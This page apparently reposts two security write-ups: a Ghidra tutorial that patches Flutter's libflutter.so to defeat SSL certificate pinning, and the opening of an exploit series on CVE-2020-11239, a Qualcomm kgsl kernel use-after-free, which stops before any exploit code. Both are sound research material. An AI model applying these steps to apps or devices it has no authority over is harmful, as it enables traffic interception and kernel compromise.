Bypassing SSL pinning on Android Flutter Apps with Ghidra

Bypassing SSL pinning on Android Flutter Apps with Ghidra

Original text by Raphael Denipotti

TL-DR

Android Apps built with the Flutter framework validate the secure connections and honour the Proxy settings in a different fashion when compared to apps written in dex). A binary dubbed libflutter.so seems to contain the dependencies responsible for establishing remote connections. This post shows the steps to patch the binary to bypass ssl pinning on Android apps (armeabi-v7a).

This binary (libflutter.so) seems to comprise the Flutter engine that is compiled (AOT). With that in mind I left the 2 patched binaries (armeabi-v7a and x86_64) to be used by security researchers when assessing Android Flutter apps that are using Dart 2.10.5 (stable). I tested these binaries on other Flutter apps using the same Dart version and they seemed to work just fine.

Additionally you can try to download the patched binary for your platform and replace within the app you want to analyze — remember to sign them before use and bear in mind that the Dart version influences the engine so different versions might not work.

Introduction

Flutter is an open-source SDK created and maintained by Google to ease the development of Mobile and Web applications. One of its main characteristics is the use of Dart as the programming language, changing some of the behaviors normally found on Android apps — i.e. Android Flutter apps don’t honour the Android proxy settings nor trust on the Android TrustManager. Some overview of its architecture can be found here.

Motivation

I’ve always been fond of bypassing SSL certificate pinning on Android apps since long ago when I was a security consultant. At that time I could never really understand how Frida worked but I recall trying to bypass ssl pinning by modifying smali code for known libs like okhttp.

Recently a friend of mine, Vinicius mentioned he was facing some challenges with an app that was built using Flutter. The main challenge arises from the fact that Flutter apps don’t trust the Android TrustManager. He also said that Frida could be used to instrument the boringssl library, one of the dependencies of the libflutter.so.

As I mentioned I’ve never been a fan of Frida as its abstraction always confused my shallow knowledge of binary analysis and code instrumentation. When Vinicius shared with me the libflutter.so alongside this blog post as a reference for intercepting traffic of Android Flutter Applications I found an opportunity to eliminate the use of Frida for this case and patch the binary to avoid certificate verification failures.

Analysis

Learning from Jeroen Beckers’s post that the exception was generated by the handshake.cc from the boringssl — that is also because Vinicius mentioned the app was suppressing errors which was making it harder to instrument with Frida.

With the method ssl_crypto_x509_session_verify_cert_chain being responsible to perform the validation and return a boolean value. Knowing that it’s a matter of trying to change its return to be always true (1):

In this analysis I used the armeabi-v7a ISA to depict the following steps.

Steps for armeabi-v7a

We will use Ghidra for this binary patching. Assuming you’ve already disassembled the apk (apktool d command) and got the libflutter.so from the related lib folder (/lib/armeabi-v7a/libflutter.so).

Note that for different instruction set architectures the patching process might differ. For x86_64 ISA, a very similar approach can be used while for arm64-v8a the return of the function is quite different (on Dart 2.10.5).

Open the libflutter.so using Ghidra. You will be asked if you would like Ghidra to analyze the binary. Hit Yes followed by Analyze.

After some (good) time of disassembling the instructions with Ghidra, it will present disassembled code that can be searched and read with its C representation. Knowing that the certificate validation happens in this piece of code:

Search for the references linking to this file [ Search | For Strings ]

The disassembler shows that the analyzed libflutter.so has 8 cross references (XREF) to the aforementioned file. Going over all of them, it’s possible to detect a function very similar to the ssl_crypto_x509_session_verify_cert_chain due to the parameters definition presented in the disassembled code:

Investigating the disassembled code and the instructions further, it’s possible to note that the register r4 is being used to hold the return value of the ssl_crypto_x509_session_verify_cert_chain:

Knowing this all we need to do is to change it to be 1 like in the following:

Note that the change we just did reflected in the disassembled code indicating that the function will always return 1 (true):

Save the changes (File | Save “libflutter.so”) and export the binary as following:

Make sure to select ELF format when exporting the file. Hit okay and cross your fingers.

If everything works fine you will see a summary like the following:

Now you just have to replace the patched binary within the disassembled apk, assemble (apktool b) and sign it again. Install the app on your device or emulator and good intercepting. It’s worth to note that as highlighted by Jeroen, “Dart is not proxy aware on Android” so the use of ProxyDroid or iptables is required.

Credits

Last but not least I’d like to give the credits to my friend Vinicius. Without his analysis and opportunity alongside a second shot on testing the app this method wouldn’t be documented.

And of course to Jeroen Beckers’ post that presented the initial steps with Frida and where/how to look.

One day short of a full chain: Part 1 — Android Kernel arbitrary code execution

Android Kernel arbitrary code execution

Original text by Man Yue Mo

In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects beta version of Chrome, both the renderer RCE and kernel code execution existed in stable versions of the respective software. All of these bugs had been patched for quite some time, with the last one patched on the first of January.

Vulnerabilities used in the series

The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, which is a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported in July 2020 to the Android security team as A-161544755 (GHSL-2020-375) and was patched in the Januray Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed to acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio to trigger a renderer RCE. This is a duplicate bug, for which an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it to the stable version and be exploitable if it weren’t reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version where the sandbox escape bug would have made into stable version of Chrome (if not reported), so these two bugs literally missed each other by one day to form a stable full chain.

Qualcomm kernel vulnerability

The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver is used to provide an interface for apps in the userland to communicate with the Adreno gpu (the gpu that is used on Qualcomm’s snapdragon chipset). As it is necessary for apps to access this driver to render themselves, this is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all of these phones that have a kernel version 4.14 or above, which should be the case for many mid-high end phones released after late 2019, for example, Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third party App on Pixel 4 due to further SELinux restrictions, but it can be launched from third party Apps on Samsung phones and possibly some others as well. The exploit in this post is largely developed with a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some adjustments of parameters, it should probably also work on flagship models like Samsung Galaxy S10 and S20 (Snapdragon version), although I don’t have those phones and have not tried it out myself.

The vulnerability here concerns the ioctl calls IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM. These calls are used by apps to create shared memory between itself and the kgsl driver.

When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After making the ioctl call successfully, the kgsl driver would map the user supplied memory into the gpu’s memory space and be able to access the user supplied memory. Depending on the type of the memory specified in the ioctl call parameter, different mechanisms are used by the kernel to map and access the user space memory.

The two different types of memory are KGSL_USER_MEM_TYPE_ADDR, which would ask kgsl to pin the user memory supplied and perform direct I/O on those memory (see, for example, Performing Direct I/O section here). The caller can also specify the memory type to be KGSL_USER_MEM_TYPE_ION, which would use a direct memory access (DMA) buffer (for example, Direct Memory Access section here) allocated by the ion allocator to allow the gpu to access the DMA buffer directly. We’ll look at the DMA buffer a bit more later as it is important to both the vulnerability and the exploit, but for now, we just need to know that there are two different types of memory objects that can be created from these ioctl calls. When using these ioctl, a kgsl_mem_entry object will first be created, and then the type of memory is checked to make sure that the kgsl_mem_entry is correctly populated. In a way, these ioctl calls act like constructors of kgsl_mem_entry:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
    entry = kgsl_mem_entry_create();
    ...
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
    //KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

In particular, when creating a kgsl_mem_entry with DMA type memory, the user supplied DMA buffer will be «attached» to the gpu, which will then allow the gpu to share the DMA buffer. The process of sharing a DMA buffer with a device on Android generally looks like this (see this for the general process of sharing a DMA buffer with a device):

  1. The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refers to the same thing.
  2. The ion allocator will then allocate memory from the ion heap, which is a special region of memory seperated from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
  3. The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
  4. The user can then pass this file descriptor to the device via an appropriate ioctl call.
  5. The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
  6. The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
  7. After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device. So care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer and then the device modified its content, resulting in stale data in the cpu (user) view) To do this, the user can use DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it.

When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachmentdma_buf_detach, and dma_buf_put to perform the appropriate clean up.

In the case of sharing DMA buffer with the kgsl driver, the sg_table that belongs to the DMA buffer will be stored in the kgsl_mem_entry as the field sgt:

static int kgsl_setup_dma_buf(struct kgsl_device *device,
				struct kgsl_pagetable *pagetable,
				struct kgsl_mem_entry *entry,
				struct dma_buf *dmabuf)
{
    ...
	sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
    ...
	meta->table = sg_table;
	entry->priv_data = meta;
	entry->memdesc.sgt = sg_table;

On the other hand, in the case of a MAP_USER_MEM type memory object, the sg_table in memdesc.sgt is created and owned by the kgsl_mem_entry:

static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
    ...
    //Creates an sg_table and stores it in memdesc->sgt
	ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
					0, memdesc->size, GFP_KERNEL);

As such, care must be taken with the ownership of memdesc->sgt when kgsl_mem_entry is destroyed. If the ioctl call somehow failed, then the memory object that is created will have to be destroyed. Depending on the type of the memory, the clean up logic will be different:

unmap:
	if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
		kgsl_destroy_ion(entry->priv_data);
		entry->memdesc.sgt = NULL;
	}

	kgsl_sharedmem_free(&entry->memdesc);

If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer, entry->memdesc.sgt is set to NULL before entering kgsl_sharedmem_free, which will free entry->memdesc.sgt:

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
    ...
	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	if (memdesc->pages)
		kgsl_free(memdesc->pages);
}

So far, so good, everything is taken care of, but a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the code would first check if the user supplied address is allocated by the ion allocator, if so, it will create an ION type memory object instead.

static int kgsl_setup_useraddr(struct kgsl_device *device,
		struct kgsl_pagetable *pagetable,
		struct kgsl_mem_entry *entry,
		unsigned long hostptr, size_t offset, size_t size)
{
    ...
 	/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
	ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
	if (ret != -ENODEV)
		return ret;

	/* Okay - lets go legacy */
	return kgsl_setup_anon_useraddr(pagetable, entry,
		hostptr, offset, size);
}

While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong and memdesc->sgt will be incorrectly deleted. Fortunately, before the ION ABI change introduced in the 4.12 kernel, the now freed sg_table cannot be reached again. However, after this change, the sg_table gets added to the dma_buf_attachment when a DMA buffer is attached to a device, and the dma_buf_attachment is then stored in the DMA buffer.

static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
                                struct dma_buf_attachment *attachment)
{
    ...
        table = dup_sg_table(buffer->sg_table);
    ...
        a->table = table;                          //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
    ...
        mutex_lock(&buffer->lock);
        list_add(&a->list, &buffer->attachments);  //<---- d. attachment got added to dma_buf::attachments
        mutex_unlock(&buffer->lock);
        return 0;
}

This will normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case, (kgsl_destroy_ion is not called) meaning that after the ioctl call failed, the user supplied DMA buffer will end up with an attachment that contains a free’d sg_table. This sg_table will then be used any time when the DMA_BUF_IOCTL_SYNC call is used on the buffer:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
                                          enum dma_data_direction direction,
                                          bool sync_only_mapped)
{
    ...
        list_for_each_entry(a, &buffer->attachments, list) {
        ...
                if (sync_only_mapped)
                        tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,        //<--- use-after-free of a->table
                                                  a->table->nents,
                                                  &buffer->vmas,
                                                  direction, true);
                else
                        dma_sync_sg_for_cpu(a->dev, a->table->sgl,              //<--- use-after-free of a->table
                                            a->table->nents, direction);
            ...
                }
        }
...
}

There are actually multiple paths in this ioctl that can lead to the use of the sg_table in different ways.

Getting a free’d object with a fake out-of-memory error

While this looks like a very good use-after-free that allows me to hold onto a free’d object and use it at any convenient time, as well as in different ways, to trigger it, I first need to cause the IOCTL_KGSL_GPUOBJ_IMPORT or IOCTL_KGSL_MAP_USER_MEM to fail and to fail at the right place. The only place where a use-after-free can happen in the IOCTL_KGSL_GPUOBJ_IMPORT call is when it fails at kgsl_mem_entry_attach_process:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

	if (ret)
		goto out;

    ...
	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
	if (ret)
		goto unmap;

This is the last point where the call can fail. Any earlier failure will also not result in kgsl_sharedmem_free being called. One way that this can fail is if kgsl_mem_entry_track_gpuaddr failed to reserve memory in the gpu due to out-of-memory error:

static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
		struct kgsl_process_private *process,
		struct kgsl_mem_entry *entry)
{
    ...
	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
	if (ret) {
		kgsl_process_private_put(process);
		return ret;
	}

Of course, to actually cause an out-of-memory error would be rather difficult and unreliable, as well as risking to crash the device by exhausting the memory.

If we look at how a user provided address is mapped to gpu address in kgsl_iommu_get_gpuaddr, (which is called by kgsl_mem_entry_track_gpuaddr, note that these are actually user space gpu address in the sense that they are used by the gpu with a user process specific pagetable to resolve the actual addresses, so different processes can have the same gpu addresses that resolved to different actual locations, in the same way that user space addresses can be the same in different processes but resolved to different locations) then we see that an alignment parameter is taken from the flags of the kgsl_memdesc:

static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc)
{
    ...
	unsigned int align;
    ...
    //Uses `memdesc->flags` to compute the alignment parameter
	align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
			memdesc->pad_to);
...

and the flags of memdesc is taken from the flags parameter when the ioctl is called:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);

When mapping memory to the gpu, this align value will be used to ensure that the memory address is mapped to a value that is aligned (i.e. multiples of) to align. In particular, the gpu address will be the next multiple of align that is not already occupied. If no such value exist, then an out-of-memory error will occur. So by using a large align value in the ioctl call, I can easily use up all the addresses that are aligned with the value that I specified. For example, if I set align to be 1 << 31, then there will only be two addresses that aligns with align (0 and 1 << 31). So after just mapping one memory object (which can be as small as 4096 bytes), I’ll get an out-of-memory error the next time I use the ioctl call. This will then give me a free’d sg_table in the DMA buffer. By allocating another object of similar size in the kernel, I can then replace this sg_table with an object that I control. I’ll go through the details of how to do this later, but for now, let’s assume I am able to do this and have complete control of all the fields in this sg_table and see what this bug potentially allows me to do.

The primitives of the vulnerability

As mentioned before, there are different ways to use the free’d sg_table via the DMA_BUF_IOCTL_SYNC ioctl call:

static long dma_buf_ioctl(struct file *file,
			  unsigned int cmd, unsigned long arg)
{
    ...
	switch (cmd) {
	case DMA_BUF_IOCTL_SYNC:
        ...
		if (sync.flags & DMA_BUF_SYNC_END)
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_end_cpu_access_umapped(dmabuf,
								     dir);
			else
				ret = dma_buf_end_cpu_access(dmabuf, dir);
		else
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_begin_cpu_access_umapped(dmabuf,
								       dir);
			else
				ret = dma_buf_begin_cpu_access(dmabuf, dir);

		return ret;

These will ended up calling the functions __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access that provide the concrete implemenations.

As explained before, the DMA_BUF_IOCTL_SYNC call is meant to synchronize the cpu view of the DMA buffer and the device (in this case, gpu) view of the DMA buffer. For the kgsl device, the synchronization is implemented in lib/swiotlb.c. The various different ways of syncing the buffer will more or less follow a code path like this:

  1. The scatterlist in the free’d sg_table is iterated in a loop;
  2. In each iteration, the dma_address and dma_length of the scatterlist is used to identify the location and size of the memory for synchronization.
  3. The function swiotlb_sync_single is called to perform the actual synchronization of the memory.

So what does swiotlb_sync_single do? It first checks whether the dma_address (dev_addrdma_to_phys for kgsl is just the identity function) in the scatterlist is an address of a swiotlb_buffer using the is_swiotlb_buffer function, if so, it calls swiotlb_tlb_sync_single, otherwise, it will call dma_mark_clean.

static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
		    size_t size, enum dma_data_direction dir,
		    enum dma_sync_target target)
{
	phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);

	BUG_ON(dir == DMA_NONE);

	if (is_swiotlb_buffer(paddr)) {
		swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
		return;
	}

	if (dir != DMA_FROM_DEVICE)
		return;

	dma_mark_clean(phys_to_virt(paddr), size);
}

The function dma_mark_clean simply flushes the cpu cache that corresponds to dev_addr and keeps the cpu cache in sync with the actual memory. I wasn’t able to exploit this path and so I’ll concentrate on the swiotlb_tbl_sync_single path.

void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
			     size_t size, enum dma_data_direction dir,
			     enum dma_sync_target target)
{
	int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
	phys_addr_t orig_addr = io_tlb_orig_addr[index];

	if (orig_addr == INVALID_PHYS_ADDR)                            //<--------- a. checks address valid
		return;
	orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);

	switch (target) {
	case SYNC_FOR_CPU:
		if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
			swiotlb_bounce(orig_addr, tlb_addr,
				       size, DMA_FROM_DEVICE);
    ...
}

After a further check of the address (tlb_addr) against an array io_tlb_orig_addr, the function swiotlb_bounce is called.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
	unsigned char *vaddr = phys_to_virt(tlb_addr);
	if (PageHighMem(pfn_to_page(pfn))) {
        ...

		while (size) {
			sz = min_t(size_t, PAGE_SIZE - offset, size);

			local_irq_save(flags);
			buffer = kmap_atomic(pfn_to_page(pfn));
			if (dir == DMA_TO_DEVICE)
				memcpy(vaddr, buffer + offset, sz);
			else
				memcpy(buffer + offset, vaddr, sz);
            ...
		}
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

As tlb_addr and size comes from a scatterlist in the free’d sg_table, it becomes clear that I may be able to call a memcpy with a partially controlled source/destination (tlb_addr comes from scatterlist but is constrained as it needs to pass some checks, while size is unchecked). This could potentially give me a very strong relative read/write primitive. The questions are:

  1. What is the swiotlb_buffer and is it possible to pass the is_swiotlb_buffer check without a seperate info leak?
  2. What is the io_tlb_orig_addr and how to pass that test?
  3. How much control do I have with the orig_addr, which comes from io_tlb_orig_addr?

The Software Input Output Translation Lookaside Buffer

The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with physical address smaller than 32 bits. It seems to be very rarely used in modern Android phones and as far as I can gather, there are two main uses of it:

  1. It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow access of it from the device. This is the code path that we have been looking at. As this would mean an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not an ideal scenario but is rather only used as a last resort.
  2. To use as a layer of protection to avoid untrusted usb devices from accessing DMA memory directly (See here)

As the second usage is likely to involve plugging a usb device to a phone and thus requires physical access. I’ll only cover the first usage here, which will also answer the three questions in the previous section.

To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check is_swiotlb_buffer to determine whether a physical address belongs to the SWIOTLB:

int is_swiotlb_buffer(phys_addr_t paddr)
{
	return paddr >= io_tlb_start && paddr < io_tlb_end;
}

The global variables io_tlb_start and io_tlb_end marks the range of the SWIOTLB. As mentioned before, the SWIOTLB needs to be an address smaller than 32 bits. How does the kernel guarantee this? By allocating the SWIOTLB very early during boot. From a rooted device, we can see that the SWIOTLB is allocated nearly right at the start of the boot. This is an excerpt of the kernel log during the early stage of booting a Pixel 4:

...
[    0.000000] c0      0 software IO TLB: swiotlb init: 00000000f3800000
[    0.000000] c0      0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...

Here we see that io_tlb_start is 0xf3800000 while io_tlb_end is 0xf3c00000.

While allocating the SWIOTLB early makes sure that the its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the swiotlb boot parameter. For Pixel 4, this is swiotlb=2048 (which seems to be a common parameter and is the same for Galaxy S10 and S20) and will allocate 4MB of SWIOTLB (allocation size = swiotlb * 2048) For the Samsung Galaxy A71, the parameter is set to swiotlb=1, which allocates the minimum amount of SWIOTLB (0x40000 bytes)

[    0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)

The SWIOTLB will be at the same location when changing swiotlb to 1 on Pixel 4.

This provides us with a predicable location for the SWIOTLB to pass the is_swiotlb_buffer test.

Let’s take a look at io_tlb_orig_addr next. This is an array used for storing addresses of DMA buffers that are attached to devices with addresses that are too high for the device to access:

int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
		     enum dma_data_direction dir, unsigned long attrs)
{
    ...
	for_each_sg(sgl, sg, nelems, i) {
		phys_addr_t paddr = sg_phys(sg);
		dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);

		if (swiotlb_force == SWIOTLB_FORCE ||
		    !dma_capable(hwdev, dev_addr, sg->length)) {
            //device cannot access dev_addr, so use SWIOTLB as a proxy
			phys_addr_t map = map_single(hwdev, sg_phys(sg),
						     sg->length, dir, attrs);
             ...
}

In this case, map_single will store the address of the DMA buffer (dev_addr) in the io_tlb_orig_addr. This means that if I can cause a SWIOTLB mapping to happen by attaching a DMA buffer with high address to a device that cannot access it (!dma_capable), then the orig_addr in memcpy of swiotlb_bounce will point to a DMA buffer that I control, which means I can read and write its content with complete control.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
    //orig_addr is the address of a DMA buffer uses the SWIOTLB mapping
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both read and write of a region behind the SWIOTLB region with arbitrary size (and completely controlled content in the case of write). In what follows, this is what I’m going to use for the exploit.

To summarize, this is how synchronization works for DMA buffer shared with the implementation in /lib/swiotlb.c.

When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

figure

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the io_tlb_orig_addr array is served as a look up table to locate the DMA buffer from the SWIOTLB.

figure

In the use-after-free scenario, I can control the size of the memcpy between the DMA buffer and SWIOTLB in the above figure and that turns into a read/write primitive:

figure

Provided I can control the scatterlist that specifies the location and size of the SWIOTLB, I can specify the size to be larger than the original DMA buffer to cause an out-of-bounds access (I still need to point to the SWIOTLB to pass the checks). Of course, it is no good to just cause out-of-bounds access, I need to be able to read back the out-of-bounds data in the case of a read access and control the data that I write in the case of a write access. This issue will be addressed in the next section.

Allocating a Software Input Output Translation Lookaside Buffer

As it turns out, the SWIOTLB is actually very rarely used. For one or another reason, either because most devices are capable of reading 64 bit addresses, or that the DMA buffer synchronization is implemented with arm_smmu rather than swiotlb, I only managed to allocate a SWIOTLB using the adsprpc driver. The adsprpc driver is used for communicating with the DSP (digital signal processor), which is a seperate processor on Qualcomm’s snapdragon chipset. The DSP and the adsprpc itself is a very vast topic that had many security implications, and it is out of the scope of this post.

Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver is for. It allows the kernel to communicate with the DSP (which is running on a separate kernel and OS altogether, so this is truly «remote») to invoke functions, allocate memory and retrieve results from the DSP.

While access to the adsprpc driver from third-party apps is not granted in the default SELinux settings and as such, I’m unable to use it on Google’s Pixel phones, it is still enabled on many different phones running Qualcomm’s snapdragon SoC (system on chip). For example, Samsung phones allow accesses of adsprpc from third party Apps, which allows the exploit in this post to be launched directly from a third party App or from a compromised beta version of Chrome (or any other compromised App). On phones which adsprpc accesses is not allowed, such as the Pixel 4, an additional bug that compromises a service that can access adsprpc is required to launch this exploit. There are various services that can access the adsprpc driver and reachable directly from third party Apps, such as the hal_neuralnetworks, which is implemented as a closed source service in android.hardware.neuralnetworks@1.x-service-qti. I did not investigate this path, so I’ll assume Samsung phones in the rest of this post.

With adsprpc, the most obvious ioctl to use for allocating SWIOTLB is the FASTRPC_IOCTL_MMAP, which calls fastrpc_mmap_create to attach a DMA buffer that I supplied:

static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
	unsigned int attr, uintptr_t va, size_t len, int mflags,
	struct fastrpc_mmap **ppmap)
{
    ...
	} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
		VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
		if (err)
			goto bail;
		VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
        ...
		map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
        ...

However, the call seems to always fail when fastrpc_mmap_on_dsp is called, which will then detach the DMA buffer from the adsprpc driver and remove the SWIOTLB that was just allocated. While it is possible to work with a temporary buffer like this by racing with multiple threads, it would be better if I can allocate a permanent SWIOTLB.

Another possibility is to use the get_args function, which will also invoke fastrpc_mmap_create:

static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
    ...
	for (i = bufs; i < bufs + handles; i++) {
        ...
		if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
			dmaflags = FASTRPC_DMAHANDLE_NOMAP;
		VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
				FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
				&ctx->maps[i]));
        ...
	}

The get_args function is used in the various FASTRPC_IOCTL_INVOKE_* calls for passing arguments to invoke functions on the DSP. Under normal circumstances, a corresponding put_args will be called to detach the DMA buffer from the adsprpc driver. However, if the remote invocation failed, the call to put_args will be skipped and the clean up will be deferred to the time when the adsprpc file is close:

static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
				   uint32_t kernel,
				   struct fastrpc_ioctl_invoke_crc *inv)
{
    ...
	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
		PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
		VERIFY(err, 0 == get_args(kernel, ctx));                  //<----- get_args
		PERF_END);
		if (err)
			goto bail;
	}
    ...
 wait:
	if (kernel) {
      ....
	} else {
		interrupted = wait_for_completion_interruptible(&ctx->work);
		VERIFY(err, 0 == (err = interrupted));
		if (err)
			goto bail;                                        //<----- invocation failed and jump to bail directly
	}
    ...
	VERIFY(err, 0 == put_args(kernel, ctx, invoke->pra));    //<------ detach the arguments
	PERF_END);
    ...
 bail:
    ...
	return err;
}

So by using FASTRPC_IOCTL_INVOKE_* with an invalid remote function, it is easy to allocate and keep the SWIOTLB alive until I choose to close the /dev/adsprpc-smd file that is used to make the ioctl call. This is the only part that the adsprpc driver is needed and we’re now set up to start writing the exploit.

Now that I can allocate SWIOTLB that maps to DMA buffers that I created, I can do the following to exploit the out-of-bounds read/write primitive from the previous section.

